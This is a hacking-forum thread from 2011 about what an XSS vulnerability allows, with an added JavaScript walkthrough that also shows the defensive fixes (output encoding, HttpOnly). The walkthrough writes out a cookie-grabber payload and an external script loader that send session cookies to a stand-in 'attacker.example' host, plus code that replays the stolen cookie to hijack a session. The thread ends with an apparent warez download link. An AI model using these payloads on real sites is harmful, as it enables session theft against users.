EvilZone
Hacking and Security => PiZZ4, September 11, 2011, 09:14:48 PM
-
I'm sort of a noob when it comes to XSS vulnerabilities, so here is a noob question:
Let's say you have found an XSS vulnerability on a website. What can you do with it?
-
I guess nothing, unless it's a persistent one.
-
I guess nothing, unless it's a persistent one.
And this isn't true.
You could make a cookie grabber and send the XSS-vulnerable link to victims, for example.
-
You can do whatever you want: exploit a browser bug, steal credentials, use browsers as zombies.
If it is persistent, so much easier. If not, it's also exploitable (more likely in targeted attacks).
For an example, look for the BeEF framework.
-
You can steal the credentials of someone if he/she clicks the link or visits the exploit.
http://www.youtube.com/watch?v=WZCXIrW0xZ0
http://www.youtube.com/watch?v=JBpG2fie_aA&feature=related
Thanks to Infinity Exists.
I know a bit of the theory, but I've never done it before.
-
Insert JavaScript into the page. Sometimes it's a bit difficult with the filters; basic PHP filters may require some code maneuvering, but it's easy enough to run JavaScript or link to a JS file. Last time I did an XSS I used JS to change the background image to a dancing banana.
-
You can do whatever you want: exploit a browser bug, steal credentials, use browsers as zombies.
If it is persistent, so much easier. If not, it's also exploitable (more likely in targeted attacks).
For an example, look for the BeEF framework.
It's definitely persistent, I've double checked just to make sure it was.
Insert JavaScript into the page. Sometimes it's a bit difficult with the filters; basic PHP filters may require some code maneuvering, but it's easy enough to run JavaScript or link to a JS file. Last time I did an XSS I used JS to change the background image to a dancing banana.
Now that is interesting, I guess I'll have to look into that.
-
Now that is interesting, I guess I'll have to look into that.
It has to be a .js file. I spent a long time screwing up because I was trying to run .txt extensions and extensionless files in HTML.
-
Session Hijacking.
-
Session Hijacking.
That would be the same as cookie grabbing.
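The cookie grabber, the external .js loader and the session hijacking mentioned in the posts above, worked through end to end as an added example (this is not code from the thread or from any project it mentions). It shows a toy "search" page that reflects its query string, the payload that ships `document.cookie` off to a collector, what the collector gets back and replays, and the two fixes a defender applies: HTML output encoding and `HttpOnly` on the session cookie. The hosts `victim.example` and `attacker.example`, the `/grab` endpoint and the cookie values are all constructed for the demonstration.

```javascript
// Added example, not code from the thread. Toy reflected-XSS page, a cookie
// grabber of the kind described above, the attacker's side, and the fixes.
// All hosts, paths and cookie values below are made up for the demonstration.

const ATTACKER = "http://attacker.example"; // assumed attacker-controlled host

// Vulnerable: the search term is concatenated into HTML with no encoding.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Fixed: encode the characters that can break out of an HTML text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSearchSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Cookie grabber: once it runs in the victim's page it fires an image request
// whose URL carries document.cookie to the attacker's collector.
const cookieGrabber =
  `<script>new Image().src="${ATTACKER}/grab?c="+encodeURIComponent(document.cookie)</script>`;

// Same idea with the code hosted on the attacker's server, as the thread suggests.
const externalLoader = `<script src="${ATTACKER}/grab.js"></script>`;

// The link an attacker sends to a victim in the reflected (non-persistent) case.
function craftLink(base, payload) {
  return `${base}?q=${encodeURIComponent(payload)}`;
}

// Server side of the reflection: read ?q= from the link and render it.
function serverHandles(link, render) {
  const q = new URL(link).searchParams.get("q");
  return render(q);
}

// Did a live <script> tag survive into the response the browser will parse?
function containsScript(html) {
  return /<script[\s>]/i.test(html);
}

// What document.cookie exposes: cookies set with HttpOnly are invisible to
// script, so they cannot be grabbed this way even when the XSS fires.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly/i.test(h))
    .map((h) => h.split(";")[0].trim())
    .join("; ");
}

// Attacker side: the collector pulls the stolen value out of the image request
// and replays it as a Cookie header. That replay is the session hijack.
function replayHeaderFromGrab(requestUrl) {
  const c = new URL(requestUrl).searchParams.get("c");
  return c ? { Cookie: c } : null;
}

// Walk through the whole exchange with constructed data. Nothing is sent.
function demo() {
  const link = craftLink("http://victim.example/search", cookieGrabber);
  const vulnerable = serverHandles(link, renderSearchVulnerable);
  const safe = serverHandles(link, renderSearchSafe);

  // Constructed Set-Cookie headers: as deployed, and with HttpOnly added.
  const setCookies = ["session=abc123; Path=/", "prefs=dark; Path=/"];
  const hardened = ["session=abc123; Path=/; HttpOnly; Secure", "prefs=dark; Path=/"];

  // The request the grabber would make from the unhardened site.
  const grabUrl = `${ATTACKER}/grab?c=${encodeURIComponent(scriptVisibleCookies(setCookies))}`;

  return {
    link,
    externalLoader,
    vulnerableFires: containsScript(vulnerable), // true: script reflected as-is
    safeFires: containsScript(safe),             // false: script is encoded text
    stolen: scriptVisibleCookies(setCookies),    // "session=abc123; prefs=dark"
    stolenHardened: scriptVisibleCookies(hardened), // "prefs=dark"
    replay: replayHeaderFromGrab(grabUrl),       // { Cookie: "session=abc123; prefs=dark" }
  };
}

console.log(demo());
```

Two practitioner caveats on top of what the thread says. First, `HttpOnly` stops the cookie grab but not the XSS itself: script running in the victim's page can still send requests with the victim's cookies attached, which is exactly what a hooking framework like BeEF relies on, so output encoding (the `escapeHtml` path) is the fix and `HttpOnly` is only a damage limiter. Second, for the external-script case the browser loads whatever the `src` URL returns regardless of file extension; what it checks is the response `Content-Type`, and a server sending `X-Content-Type-Options: nosniff` will refuse to execute a response whose type is not a JavaScript type.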
-
http://rapidshare.com/files/129854305/www_GoonWarez_com_1213375552.zip